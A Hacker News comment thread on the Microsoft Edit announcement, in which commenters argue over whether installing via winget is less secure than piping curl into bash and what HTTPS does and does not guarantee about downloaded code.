Microsoft Edit

(github.com)

486 points ethanpil | 1 comments | 25 Jun 25 00:07 UTC | HN request time: 0s | source

Show context

ocdtrekkie ◴[25 Jun 25 01:38 UTC] No.44372923[source]▶

It'd be nice if they didn't recommend winget for installation though. winget is an egregious security risk that Microsoft has just like pretended follows even minimal security practices, despite just launching four years ago with no protection from bad actors whatsoever and then never implementing any improvements since.

replies(2): >>44372958 #>>44373306 #

dale_huevo ◴[25 Jun 25 03:03 UTC] No.44373306[source]▶

>>44372923 #

winget is just Windows developers' version of curl | bash. Yet another example of Microsoft copying Linux features.

replies(2): >>44373331 #>>44376065 #

ocdtrekkie ◴[25 Jun 25 03:08 UTC] No.44373331[source]▶

>>44373306 #

Except curl | bash definitely executes code by the author controlling the URL you put in, and if the URL is HTTPS, in a reasonably secure fashion.

There is no validation when you winget whether or not the executable is from the official source or that a third party contributor didn't tamper with how it's maintained.

replies(3): >>44373345 #>>44373356 #>>44373443 #

1. dale_huevo ◴[25 Jun 25 03:11 UTC] No.44373345[source]▶

>>44373331 #

If you think HTTPS is performing code validation I have news for you.

HTTPS only guarantees the packets containing the unverified malicious code are not tampered with from the server to you. A server which could very well be compromised and alternate code put in its place.

You are drawing an egregious apples-to-oranges comparison here. Please re-read what you said.

You could serve digitally signed code over plain HTTP and it would be more secure than your example over HTTPS. Unfortunately there are a lot of HTTPS old wives' tales that many misinformed developers believe in.

↑